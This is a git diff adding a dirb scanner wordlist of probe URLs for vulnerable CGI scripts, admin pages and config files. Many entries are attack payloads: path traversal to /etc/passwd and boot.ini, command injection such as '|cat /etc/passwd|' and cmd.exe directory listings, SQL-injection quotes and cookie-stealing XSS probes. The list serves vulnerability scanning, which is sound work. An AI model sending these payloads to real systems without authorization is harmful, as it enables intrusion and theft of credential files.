Diffstat (limited to 'wordlists/dirb/vulns/cgis.txt')
-rw-r--r-- | wordlists/dirb/vulns/cgis.txt | 3494 |
1 files changed, 3494 insertions, 0 deletions
diff --git a/wordlists/dirb/vulns/cgis.txt b/wordlists/dirb/vulns/cgis.txt
new file mode 100644
index 0000000..54cc3a5
--- /dev/null
+++ b/wordlists/dirb/vulns/cgis.txt
@@ -0,0 +1,3494 @@ +TiVoConnect?Command=QueryServer +TiVoConnect?Command=QueryContainer&Container=/&Recurse=Yes +cgi-bin/cart32.exe +cgi-bin/classified.cgi +cgi-bin/download.cgi +cgi-bin/flexform.cgi +cgi-bin/flexform +cgi-bin/lwgate.cgi +cgi-bin/LWGate.cgi +cgi-bin/lwgate +cgi-bin/LWGate +cgi-bin/perlshop.cgi +cfappman/index.cfm +cfdocs/examples/cvbeans/beaninfo.cfm +cfdocs/examples/parks/detail.cfm +kboard/ +lists/admin/ +splashAdmin.php +ssdefs/ +sshome/ +tiki/ +tiki/tiki-install.php +scripts/samples/details.idc +_vti_bin/shtml.exe +cgi-bin/handler.cgi +cgi-bin/finger +cgi-bin/finger.pl +cgi-bin/formmail.cgi +cgi-bin/formmail.pl +cgi-bin/formmail +cgi-bin/get32.exe +cgi-bin/gm-authors.cgi +cgi-bin/guestbook/passwd +cgi-bin/horde/test.php?mode=phpinfo +cgi-bin/photo/protected/manage.cgi +cgi-bin/wrap.cgi +./ +~root/ +cgi-bin/wrap +forums/@ADMINconfig.php +forums/config.php +ganglia/ +guestbook/guestbookdat +guestbook/pwd +help/ +hola/admin/cms/htmltags.php?datei=./sec/data.php +horde/imp/test.php +horde/test.php?mode=phpinfo +imp/horde/test.php?mode=phpinfo +imp/horde/test.php +index.html.bak +index.html~ +index.php?chemin=..%2F..%2F..%2F..%2F..%2F..%2F..%2F%2Fetc +global.inc +cgi-bin/formmail.pl +cgi-bin/horde/test.php +inc/common.load.php +inc/config.php +inc/dbase.php +cgi-bin/visadmin.exe +cgi-bin/html2chtml.cgi +cgi-bin/html2wml.cgi +cgi-bin/pollit/Poll_It_SSI_v2.0.cgi?data_dir=\etc\passwd%00 +cgi-bin/echo.bat?&dir+c:\ +cgi-bin/excite;IFS=\"$\";/bin/cat +cgi-bin/ezshopper/loadpage.cgi?user_id=1&file=|cat%20/etc/passwd| +cgi-bin/guestbook.cgi +cgi-bin/guestbook.pl +cgi-bin/ss +forumdisplay.php?GLOBALS[]=1&f=2&comma=\".system('id').\" +guestbook/guestbook.html +html/cgi-bin/cgicso?query=AAA +geeklog/users.php +gb/index.php?login=true +guestbook/admin.php +cgi-bin/gH.cgi +cgi-bin/gm-cplog.cgi +getaccess +help.html +cgi-bin/gm.cgi +filemanager/filemanager_forms.php +cgi-bin/AT-admin.cgi +cgi-bin/auth_data/auth_user_file.txt +cgi-bin/awstats.pl 
+cgi-bin/awstats/awstats.pl +cgi-bin/blog/mt.cfg +cgi-bin/cart.pl?db=' +cgi-bin/cart.pl?db=' +cgi-bin/htsearch?config=foofighter&restrict=&exclude=&method=and&format=builtin-long&sort=score&words= +cgi-bin/mt-static/mt-check.cgi +cgi-bin/mt/mt-check.cgi +cfdocs/expeval/openfile.cfm +index.php/123 +mambo/index.php?Itemid=JUNK(5) +profile.php?u=JUNK(8) +ticket.php?id=99999 +vgn/login/1,501,,00.html?cookieName=x--\> +a%5c.aspx +cgi-bin/banner.cgi +cgi-bin/bannereditor.cgi +cgi-bin/book.cgi?action=default¤t=|cat%20/etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10 +admin/browse.asp?FilePath=c:\&Opt=2&level=0 +cgi-bin/architext_query.pl +cgi-bin/bizdb1-search.cgi +cgi-bin/blog/ +tsweb/ +cgi-bin/blog/mt-load.cgi +cgi-bin/atk/javascript/class.atkdateattribute.js.php?config_atkroot=http://xxxxxxxxxx/ +vgn/performance/TMT +vgn/performance/TMT/Report +vgn/performance/TMT/Report/XML +vgn/performance/TMT/reset +vgn/ppstats +vgn/previewer +vgn/record/previewer +vgn/stylepreviewer +vgn/vr/Deleting +vgn/vr/Editing +vgn/vr/Saving +vgn/vr/Select +scripts/iisadmin/bdir.htr +scripts/iisadmin/ism.dll +scripts/tools/ctss.idc +bigconf.cgi +billing/billing.apw +blah_badfile.shtml +blah-whatever-badfile.jsp +vgn/style +scripts/no-such-file.pl +SiteServer/Admin/commerce/foundation/domain.asp +SiteServer/Admin/commerce/foundation/driver.asp +SiteServer/Admin/commerce/foundation/DSN.asp +SiteServer/admin/findvserver.asp +SiteServer/Admin/knowledge/dsmgr/default.asp +cgi-bin/cgiwrap/%3Cfont%20color=red%3E +cgi-bin/moin.cgi?test +autologon.html?10514 +basilix/mbox-list.php3 +basilix/message-read.php3 +clusterframe.jsp +IlohaMail/blank.html +bb-dnbd/faxsurvey +cartcart.cgi +scripts/Carello/Carello.dll +scripts/tools/dsnform.exe +scripts/tools/dsnform +SiteServer/Admin/knowledge/dsmgr/users/GroupManager.asp +SiteServer/Admin/knowledge/dsmgr/users/UserManager.asp +prd.i/pgen/ +readme.eml +scripts/httpodbc.dll +scripts/proxy/w3proxy.dll +scripts/root.exe?/c+dir+c:\+/OG 
+SiteServer/admin/ +siteseed/ +scripts/samples/search/author.idq +scripts/samples/search/filesize.idq +scripts/samples/search/filetime.idq +scripts/samples/search/queryhit.idq +scripts/samples/search/simple.idq +pccsmysqladm/incs/dbconnect.inc +iisadmin/ +password.inc +PDG_Cart/oder.log +web-console/ServerInfo.jsp%00 +global.asa +exchange/lib/AMPROPS.INC +exchange/lib/DELETE.INC +exchange/lib/GETREND.INC +exchange/lib/GETWHEN.INC +exchange/lib/JSATTACH.INC +exchange/lib/JSROOT.INC +exchange/lib/JSUTIL.INC +exchange/lib/LANG.INC +exchange/lib/logon.inc +exchange/lib/PAGEUTIL.INC +exchange/lib/PUBFLD.INC +exchange/lib/RENDER.INC +exchange/lib/SESSION.INC +ows/restricted%2eshow +WEB-INF./web.xml +view_source.jsp +w-agora/ +vider.php3 +exchange/root.asp?acs=anon +officescan/cgi/cgiChkMasterPwd.exe +%NETHOOD%/ +cgi-bin/astrocam.cgi +cgi-bin/badmin.cgi +cgi-bin/boozt/admin/index.cgi?section=5&input=1 +cgi-bin/ezadmin.cgi +cgi-bin/ezboard.cgi +cgi-bin/ezman.cgi +cgi-bin/foxweb.dll +cgi-bin/foxweb.exe +cgi-bin/mgrqcgi +cgi-bin/wconsole.dll +cgi-bin/webplus.exe?about +pbserver/pbserver.dll +administrator/gallery/uploadimage.php +pafiledb/includes/team/file.php +phpEventCalendar/file_upload.php +servlet/com.unify.servletexec.UploadServlet +cgi-win/uploader.exe +scripts/cpshost.dll +scripts/repost.asp +upload.asp +uploadn.asp +uploadx.asp +wa.exe +basilix/compose-attach.php3 +server/ +cgi-bin/fpsrvadm.exe +siteminder/smadmin.html +vgn/ac/data +vgn/ac/delete +vgn/ac/edit +vgn/ac/esave +vgn/ac/fsave +vgn/ac/index +vgn/asp/MetaDataUpdate +vgn/asp/previewer +vgn/asp/status +vgn/asp/style +vgn/errors +vgn/jsp/controller +vgn/jsp/errorpage +vgn/jsp/initialize +vgn/jsp/jspstatus +vgn/jsp/jspstatus56 +vgn/jsp/metadataupdate +vgn/jsp/previewer +vgn/jsp/style +vgn/legacy/edit +vgn/login +webtop/wdk/samples/index.jsp +cgi-bin/.cobalt +WEB-INF/web.xml +forum/admin/wwforum.mdb +fpdb/shop.mdb +guestbook/admin/o12guest.mdb +midicart.mdb +MIDICART/midicart.mdb 
+mpcsoftweb_guestbook/database/mpcsoftweb_guestdata.mdb +news/news.mdb +newuser?Image=../../database/rbsserv.mdb +shopdbtest.asp +shopping300.mdb +shopping400.mdb +shoppingdirectory/midicart.mdb +SilverStream/Meta/Tables/?access-mode=text +database/db2000.mdb +cgi-bin/mailit.pl +cgi-bin/search +doc/webmin.config.notes +error/HTTP_NOT_FOUND.html.var +oem_webstage/cgi-bin/oemapp_cgi +ADMINconfig.php +cgi-bin/.access +cgi-bin/%2e%2e/abyss.conf +cgi-bin/data/fetch.php?page= +cgi-bin/empower?DB=whateverwhatever +cgi-bin/mrtg.cgi?cfg=blah +cgi-bin/store/agora.cgi?page=whatever33.html +?mod=node&nid=some_thing&op=view +?mod=some_thing&op=browse +article.php?article=4965&post=1111111111 +blah123.php +categorie.php3?cid=june +CFIDE/probe.cfm +contents.php?new_language=elvish&mode=select +download.php?op=viewdownload +download.php?op=viewdownload +examples/basic/servlet/HelloServlet +home.php?arsc_language=elvish +hostadmin/?page=' +hostadmin/?page=' +index.php?file=index.php +jgb_eng_php3/cfooter.php3 +JUNK(5).csp +modules.php?name=Downloads&d_op=viewdownload +modules.php?name=Downloads&d_op=viewdownload +modules.php?op=modload&name=0&file=0 +modules.php?op=modload&name=Sections&file=index&req=viewarticle&artid= +modules.php?op=modload&name=Web_Links&file=index&l_op=viewlink +path/nw/article.php?id=' +path/nw/article.php?id=' +pw/storemgr.pw +rtm.log +scozbook/view.php?PG=whatever +servlet/com.livesoftware.jrun.plugins.ssi.SSIFilter +shopa_sessionlist.asp +simplebbs/users/users.php +sips/sipssys/users/a/admin/user +tcb/files/auth/r/root +typo3conf/ +typo3conf/database.sql +typo3conf/localconf.php +vchat/msg.txt +vgn/license +web.config +webamil/test.php?mode=phpinfo +webcart-lite/config/import.txt +webcart-lite/orders/import.txt +webcart/carts/ +webcart/config/ +webcart/config/clients.txt +webcart/orders/ +webcart/orders/import.txt +webmail/horde/test.php +whateverJUNK(4).html +ws_ftp.ini +WS_FTP.ini +cgi-bin/MsmMask.exe +_mem_bin/auoconfig.asp +_mem_bin/auoconfig.asp 
+_mem_bin/remind.asp +exchange/lib/ATTACH.INC +SiteServer/Admin/knowledge/persmbr/vs.asp +SiteServer/Admin/knowledge/persmbr/VsLsLpRd.asp +SiteServer/Admin/knowledge/persmbr/VsPrAuoEd.asp +SiteServer/Admin/knowledge/persmbr/VsTmPr.asp +trace.axd +tvcs/getservers.exe?action=selects1 +whatever.htr +whatever.htr +./ +nsn/fdir.bas:ShowVolume +nsn/fdir.bas +servlet/webacc?User.html=noexist +forum/admin/database/wwForum.mdb +webmail/blank.html +jamdb/ +cgi/cgiproc? +cgi-bin/addbanner.cgi +cgi-bin/af.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd +cgi-bin/alienform.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd +cgi-bin/shtml.dll +admin-serv/tasks/configuration/ViewLog?file=passwd&num=5000&str=&directories=admin-serv%2Flogs%2f..%2f..%2f..%2f..%2f..%2f..%2fetc&id=admin-serv +cgi-bin/aglimpse.cgi +cgi-bin/aglimpse +cgi-bin/architext_query.cgi +cgi-local/cgiemail-1.4/cgicso?query=AAA +cgi-local/cgiemail-1.6/cgicso?query=AAA +servlet/SchedulerTransfer +servlet/sunexamples.BBoardServlet +servlets/SchedulerTransfer +cgi-bin/cmd.exe?/c+dir +cgi-bin/cmd1.exe?/c+dir +cgi-bin/hello.bat?&dir+c:\ +cgi-bin/post32.exe|dir%20c:\ +perl/-e%20print%20Hello +admin.cgi +interscan/ +vgn/legacy/save + +IDSWebApp/IDSjsp/Login.jsp +quikstore.cfg +quikstore.cgi +securecontrolpanel/ +siteminder +webmail/ +Xcelerate/LoginPage.html +_cti_pvt/ +smg_Smxcfg30.exe?vcc=3560121183d3 +examples/servlets/index.html +nsn/..%5Cutil/attrib.bas +nsn/..%5Cutil/chkvol.bas +nsn/..%5Cutil/copy.bas +nsn/..%5Cutil/del.bas +nsn/..%5Cutil/dir.bas +nsn/..%5Cutil/dsbrowse.bas +nsn/..%5Cutil/glist.bas +nsn/..%5Cutil/lancard.bas +nsn/..%5Cutil/md.bas +nsn/..%5Cutil/rd.bas +nsn/..%5Cutil/ren.bas +nsn/..%5Cutil/send.bas +nsn/..%5Cutil/set.bas +nsn/..%5Cutil/slist.bas +nsn/..%5Cutil/type.bas +nsn/..%5Cutil/userlist.bas +nsn/..%5Cweb/env.bas +nsn/..%5Cweb/fdir.bas +nsn/..%5Cwebdemo/env.bas +nsn/..%5Cwebdemo/fdir.bas 
+wikihome/action/conflict.php +cgi-bin/archie +cgi-bin/calendar.pl +cgi-bin/calendar +cgi-bin/date +cgi-bin/fortune +cgi-bin/redirect +cgi-bin/uptime +cgi-bin/wais.pl +/ +webtop/wdk/ +SilverStream +signon +upd/ +examples/jsp/source.jsp?? +lpt9 +cfcache.map +cfdocs/cfcache.map +CVS/Entries +lpt9.xtp +mysql/db_details_importdocsql.php?submit_show=true&do=import&docpath=../../../../../../../etc +PHPMYADMINdb_details_importdocsql.php?submit_show=true&do=import&docpath=../../../../../../../etc +asp/sqlqhit.asp +asp/SQLQHit.asp +iissamples/issamples/sqlqhit.asp +iissamples/issamples/SQLQHit.asp +ISSamples/sqlqhit.asp +ISSamples/SQLQHit.asp +junk.aspx +oc/Search/sqlqhit.asp +oc/Search/SQLQHit.asp +search/htx/sqlqhit.asp +search/htx/SQLQHit.asp +search/sqlqhit.asp +search/SQLQHit.asp +sqlqhit.asp +SQLQHit.asp +cgi-bin/com5................................................................................................................................................................................................... +cgi-bin/com5.java +cgi-bin/com5.pl +?Open +?OpenServer +catalog.nsf +cersvr.nsf +cgi-bin/testing_whatever +domlog.nsf +events4.nsf +log.nsf +names.nsf +LOGIN.PWD +USER/CONFIG.AP +cgi-bin/mail +cgi-bin/nph-error.pl +cgi-bin/post-query +cgi-bin/query +cgi-bin/test-cgi.tcl +cgi-bin/test-env +.perf + + +/ +admin-serv/config/admpw +test.php%20 +*.* +cgi-bin/cgi_process +ht_root/wwwroot/-/local/httpd$map.conf +JUNK(10) +local/httpd$map.conf +tree +cgi-bin/index.js0x70 +%00/ +%00/ +%00/ +%2e/ +%2e/ +%2e/ +%2f/ +%2f/ +%2f/ +%5c/ +%5c/ +%5c/ +index.jsp%00x +weblogic +%a%s%p%d +index.html%20 +852566C90012664F +hidden.nsf +mail.box +open? 
+setup.nsf +statrep.nsf +webadmin.nsf +cgi-bin/cgitest.exe +examples/servlet/AUX +cgi-bin/hpnst.exe?c=p+i=SrvSystemInfo.html +cfdocs/cfmlsyntaxcheck.cfm +Config1.htm +contents/extensions/asp/1 +WebAdmin.dll?View=Logon +cgi-bin/Pbcgi.exe +cgi-bin/testcgi.exe +cgi-win/cgitest.exe +%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd +c/winnt/system32/cmd.exe?/c+dir+/OG +cgi-bin/snorkerz.bat +cgi-bin/snorkerz.cmd +msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:%5c +msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:%5c +msadc/samples/adctest.asp +JUNK(10) +nikto.ida +SUNWmc/htdocs/ +cgi-bin/webfind.exe?keywords=01234567890123456789 +cgi-shl/win-c-sample.exe +examples/servlet/TroubleShooter +cgi-bin/ans.pl?p=../../../../../usr/bin/id|&blah +cgi-bin/ans/ans.pl?p=../../../../../usr/bin/id|&blah +goform/CheckLogin?login=root&password=tslinux +[SecCheck]/..%2f../ext.ini +[SecCheck]/..%255c..%255c../ext.ini +[SecCheck]/..%252f..%252f../ext.ini +cgi/cfdocs/expeval/ExprCalc.cfm?OpenFilePath=c:\winnt\win.ini +cgi/cfdocs/expeval/ExprCalc.cfm?OpenFilePath=c:\windows\win.ini +.nsf/../winnt/win.ini +prxdocs/misc/prxrch.idq?CiTemplate=../../../../../../../../../../winnt/win.ini +query.idq?CiTemplate=../../../../../../../../../../winnt/win.ini +iissamples/issamples/fastq.idq?CiTemplate=../../../../../../../../../../winnt/win.ini +iissamples/issamples/query.idq?CiTemplate=../../../../../../../../../../winnt/win.ini +default.htm%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20% +default.htm%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20% +................../config.sys +cfdocs/exampleapp/email/getfile.cfm?filename=c:\boot.ini 
+cfdocs/exampleapp/docs/sourcewindow.cfm?Template=c:\boot.ini +cfdocs/expeval/exprcalc.cfm?OpenFilePath=c:\boot.ini +netget?sid=user&msg=300&file=../../../../../../../../../boot.ini +netget?sid=user&msg=300&file=../../../../../../../../../../etc/passwd +php/php.exe?c:\winnt\boot.ini +phpping/index.php?pingto=www.test.com%20|%20dir%20c:\ +scripts/db4web_c.exe/dbdirname/c%3A%5Cboot.ini +us/cgi-bin/sewse.exe?d:/internet/sites/us/sewse/jabber/comment2.jse+c:\boot.ini +wx/s.dll?d=/boot.ini +cgi-bin/Album?mode=album&album=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&dispsize=640&start=0 +%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../boot.ini +servlet/webacc?User.html=../../../../../../../../../../../../../../../../../../boot.ini%00 +cgi-bin/SQLServ/sqlbrowse.asp?filepath=c:\&Opt=3 +cgi-bin/stats/statsbrowse.asp?filepath=c:\&Opt=3 +cgi-bin/test.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\ +cgi-bin/tst.bat|dir%20..\\..\\..\\..\\..\\..\\..\\..\\, +cgi-bin/input.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\ +cgi-bin/input2.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\ +ssi/envout.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\ +php/php.exe?c:\boot.ini +../../../../../../../../../boot.ini +../../../../winnt/repair/sam._ +..\\..\\..\\..\\..\\..\\..\\boot.ini +//etc/passwd +//etc/hosts +///./../.../boot.ini +.cobalt/sysManage/../admin/.htaccess +albums/userpics/Copperminer.jpg.php?cat%20/etc/passwd +autohtml.php?op=modload&mainfile=x&name=/etc/passwd +atomicboard/index.php?location=../../../../../../../../../../etc/passwd +current/modules.php?mod=fm&file=../../../../../../../../../../etc/passwd%00&bn=fm_d1 +current/index.php?site=demos&bn=../../../../../../../../../../etc/passwd%00 +dev/translations.php?ONLY=%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd%00 +DomainFiles/*//../../../../../../../../../../etc/passwd +docs/showtemp.cfm?TYPE=JPEG&FILE=c:\boot.ini +ezhttpbench.php?AnalyseSite=/etc/passwd&NumLoops=1 +index.php?download=/winnt/win.ini 
+index.php?download=/windows/win.ini +index.php?download=/etc/passwd +index.php?|=../../../../../../../../../etc/passwd +index.php?page=../../../../../../../../../../etc/passwd +index.php?page=../../../../../../../../../../boot.ini +index.php?l=forum/view.php&topic=../../../../../../../../../etc/passwd +jsp/jspsamp/jspexamples/viewsource.jsp?source=../../../../../../../../../../etc/passwd +jsp/jspsamp/jspexamples/viewsource.jsp?source=../../../../../../../../../../boot.ini +k/home?dir=/&file=../../../../../../../../etc/passwd&lang=kor +nph-showlogs.pl?files=../../../../../../../../etc/passwd&filter=.*&submit=Go&linecnt=500&refresh=0 +nph-showlogs.pl?files=../../../../../../../../etc/&filter=.*&submit=Go&linecnt=500&refresh=0 +phprocketaddin/?page=../../../../../../../../../../boot.ini +phpwebfilemgr/index.php?f=../../../../../../../../../etc/passwd +phpwebfilemgr/index.php?f=../../../../../../../../../etc +phptonuke.php?filnavn=/etc/passwd +put/cgi-bin/putport.exe?SWAP&BOM&OP=none&Lang=en-US&PutHtml=../../../../../../../../etc/passwd +ROADS/cgi-bin/search.pl?form=../../../../../../../../../../etc/passwd%00 +support/common.php?f=0&ForumLang=../../../../../../../../../../etc/passwd +viewpage.php?file=/etc/passwd +Web_Store/web_store.cgi?page=../../../../../../../../../../etc/passwd%00.html +webMathematica/MSP?MSPStoreID=..\..\..\..\..\..\..\..\..\..\boot.ini&MSPStoreType=image/gif +webMathematica/MSP?MSPStoreID=../../../../../../../../../../etc/passwd&MSPStoreType=image/gif +cgi-bin/admin.cgi?list=../../../../../../../../../../etc/passwd +cgi-bin/14all.cgi?cfg=../../../../../../../../etc/passwd +cgi-bin/14all-1.1.cgi?cfg=../../../../../../../../etc/passwd +cgi-bin/anacondaclip.pl?template=../../../../../../../../../../etc/passwd +cgi-bin/auktion.cgi?menue=../../../../../../../../../../etc/passwd +cgi-bin/bigconf.cgi?command=view_textfile&file=/etc/passwd&filters= +cgi-bin/bb-hostsvc.sh?HOSTSVC=../../../../../../../../../../etc/passwd 
+cgi-bin/bb-hist?HISTFILE=../../../../../../../../../../etc/passwd +cgi-bin/bb-hist.sh?HISTFILE=../../../../../../../../../../etc/passwd +cgi-bin/common.php?f=0&ForumLang=../../../../../../../../../../etc/passwd +cgi-bin/commerce.cgi?page=../../../../../../../../../../etc/passwd%00index.html +cgi-bin/cgiforum.pl?thesection=../../../../../../../../../../etc/passwd%00 +cgi-bin/cal_make.pl?p0=../../../../../../../../../../etc/passwd%00 +cgi-bin/db4web_c/dbdirname//etc/passwd +cgi-bin/directorypro.cgi?want=showcat&show=../../../../../../../../../../etc/passwd%00 +cgi-bin/emumail/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00 +cgi-bin/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00 +cgi-bin/emu/html/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00 +cgi-bin/faxsurvey?cat%20/etc/passwd +cgi-bin/faqmanager.cgi?toc=/etc/passwd%00 +cgi-bin/ezshopper/search.cgi?user_id=id&database=dbase1.exm&template=../../../../../../../etc/passwd&distinct=1 +cgi-bin/formmail?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=test +cgi-bin/formmail.pl?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=test +cgi-bin/generate.cgi?content=../../../../../../../../../../winnt/win.ini%00board=board_1 +cgi-bin/generate.cgi?content=../../../../../../../../../../windows/win.ini%00board=board_1 +cgi-bin/generate.cgi?content=../../../../../../../../../../etc/passwd%00board=board_1 +cgi-bin/htmlscript?../../../../../../../../../../etc/passwd +cgi-bin/htgrep?file=index.html&hdr=/etc/passwd +cgi-bin/hsx.cgi?show=../../../../../../../../../../../etc/passwd%00 +cgi-bin/sewse?/home/httpd/html/sewse/jabber/comment2.jse+/etc/passwd +cgi-bin/sbcgi/sitebuilder.cgi +cgi-bin/mrtg.cgi?cfg=../../../../../../../../etc/passwd +cgi-bin/mrtg.cfg?cfg=../../../../../../../../etc/passwd 
+cgi-bin/main.cgi?board=FREE_BOARD&command=down_load&filename=../../../../../../../../../../etc/passwd +cgi-bin/mail/nph-mr.cgi?do=loginhelp&configLanguage=../../../../../../../etc/passwd%00 +cgi-bin/mail/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00 +cgi-bin/loadpage.cgi?user_id=1&file=..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini +cgi-bin/loadpage.cgi?user_id=1&file=../../../../../../../../../../etc/passwd +cgi-bin/htsearch?exclude=%60/etc/passwd%60 +cgi-bin/shop.cgi?page=../../../../../../../etc/passwd +cgi-bin/sendtemp.pl?templ=../../../../../../../../../../etc/passwd +cgi-bin/search/search.cgi?keys=*&prc=any&catigory=../../../../../../../../../../../../etc +cgi-bin/search.pl?form=../../../../../../../../../../etc/passwd%00 +cgi-bin/search.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini +cgi-bin/search.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini +cgi-bin/quickstore.cgi?page=../../../../../../../../../../etc/passwd%00html&cart_id= +cgi-bin/publisher/search.cgi?dir=jobs&template=;cat%20/etc/passwd|&output_number=10 +cgi-bin/php.cgi?/etc/passwd +cgi-bin/pals-cgi?palsAction=restart&documentName=/etc/passwd +cgi-bin/opendir.php?/etc/passwd +cgi-bin/nph-emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00 +cgi-bin/newsdesk.cgi?t=../../../../../../../../../../etc/passwd +cgi-bin/netauth.cgi?cmd=show&page=../../../../../../../../../../etc/passwd +cgi-bin/multihtml.pl?multi=/etc/passwd%00html +cgi-bin/webdist.cgi?distloc=;cat%20/etc/passwd +cgi-bin/way-board/way-board.cgi?db=/etc/passwd%00 +cgi-bin/way-board.cgi?db=/etc/passwd%00 +cgi-bin/view_item?HTML_FILE=../../../../../../../../../../etc/passwd%00 +cgi-bin/viewsource?/etc/passwd +cgi-bin/ttawebtop.cgi/?action=start&pg=../../../../../../../../../../etc/passwd +cgi-bin/traffic.cgi?cfg=../../../../../../../../etc/passwd +cgi-bin/technote/main.cgi?board=FREE_BOARD&command=down_load&filename=/../../../../../../../../../../etc/passwd 
+cgi-bin/talkback.cgi?article=../../../../../../../../etc/passwd%00&action=view&matchview=1 +cgi-bin/story/story.pl?next=../../../../../../../../../../etc/passwd%00 +cgi-bin/story.pl?next=../../../../../../../../../../etc/passwd%00 +cgi-bin/store/index.cgi?page=../../../../../../../../etc/passwd +cgi-bin/store.cgi?StartID=../../../../../../../../../../etc/passwd%00.html +cgi-bin/ssi//%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd +cgi-bin/sojourn.cgi?cat=../../../../../../../../../../etc/password%00 +cgi-bin/simple/view_page?mv_arg=|cat%20/etc/passwd| +cgi-bin/shopper.cgi?newpage=../../../../../../../../../../etc/passwd +servlet/webacc?User.html=../../../../../../../../../../../../../../../../../../etc/passwd%00 +webcalendar/forum.php?user_inc=../../../../../../../../../../etc/passwd +logbook.pl?file=../../../../../../../bin/cat%20/etc/passwd%00| +cgi-bin/sawmill5?rfcf+%22/etc/passwd%22+spbn+1,1,21,1,1,1,1 +page.cgi?../../../../../../../../../../etc/passwd +edittag/edittag.cgi?file=%2F..%2F..%2F..%2F..%2F..%2Fetc/passwd +base/webmail/readmsg.php?mailbox=../../../../../../../../../../../../../../etc/passwd&id=1 +cgi-bin/zml.cgi?file=../../../../../../../../../../etc/passwd%00 +cgi-bin/YaBB.pl?board=news&action=display&num=../../../../../../../../../../etc/passwd%00 +cgi-bin/whois_raw.cgi?fqdn=%0Acat%20/etc/passwd +cgi-bin/whois/whois.cgi?lookup=;&ext=/bin/cat%20/etc/passwd +cgi-bin/whois.cgi?lookup=;&ext=/bin/cat%20/etc/passwd +cgi-bin/webspirs.cgi?sp.nextform=../../../../../../../../../../etc/passwd +cgi-bin/webplus?script=../../../../../../../../../../etc/passwd +cgi-bin/webmail/html/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00 +athenareg.php?pass=%20;cat%20/etc/passwd +PSUser/PSCOErrPage.htm?errPagePath=/etc/passwd +search?NS-query-pat=../../../../../../../../../../etc/passwd +search?NS-query-pat=..\..\..\..\..\..\..\..\..\..\boot.ini +..\..\..\..\..\..\temp\temp.class +../../../../../../../../../../etc/passwd 
+.../.../.../.../.../.../.../.../.../boot.ini +................../etc/passwd +%3f.jsp +%3f.jsp +%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini +%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd +%00 +ca//\\../\\../\\../\\../\\../\\../\\windows/\\win.ini +ca/..\\..\\..\\..\\..\\..\\/\\etc/\\passwd +ca/..\\..\\..\\..\\..\\..\\..\\..\\winnt/\\win.ini +admentor/adminadmin.asp +POSTNUKEMy_eGallery/public/displayCategory.php +cgi-bin/classifieds/index.cgi +imp/mailbox.php3?actionID=6&server=x&imapuser=x';somesql+--&pass=x +userinfo.php?uid=1; +site/' +site/' +postnuke/index.php?module=My_eGallery +postnuke/html/index.php?module=My_eGallery +cgi-bin/alibaba.pl|dir%20..\\..\\..\\..\\..\\..\\..\\, +phpwebsite/index.php?module=calendar&calendar[view]=day&year=2003%00-1&month= +phpBB2/search.php?search_id=1\ +index.php?module=My_eGallery +author.asp +horde/test.php +imp/horde/test.php +cgi-bin/horde/test.php +examples/cookie +examples/session +themes/mambosimple.php?detection=detected&sitename=</title><script>alert(document.cookie)</script> +index.php?option=search&searchword=<script>alert(document.cookie);</script> +emailfriend/emailnews.php?id=\"<script>alert(document.cookie)</script> +emailfriend/emailfaq.php?id=\"<script>alert(document.cookie)</script> +emailfriend/emailarticle.php?id=\"<script>alert(document.cookie)</script> +administrator/upload.php?newbanner=1&choice=\"<script>alert(document.cookie)</script> +administrator/popups/sectionswindow.php?type=web&link=\"<script>alert(document.cookie)</script> +administrator/gallery/view.php?path=\"<script>alert(document.cookie)</script> +administrator/gallery/uploadimage.php?directory=\"<script>alert(document.cookie)</script> +administrator/gallery/navigation.php?directory=\"<script>alert(document.cookie)</script> +administrator/gallery/gallery.php?directory=\"<script>alert(document.cookie)</script> +index.php?dir=<script>alert('Vulnerable')</script> 
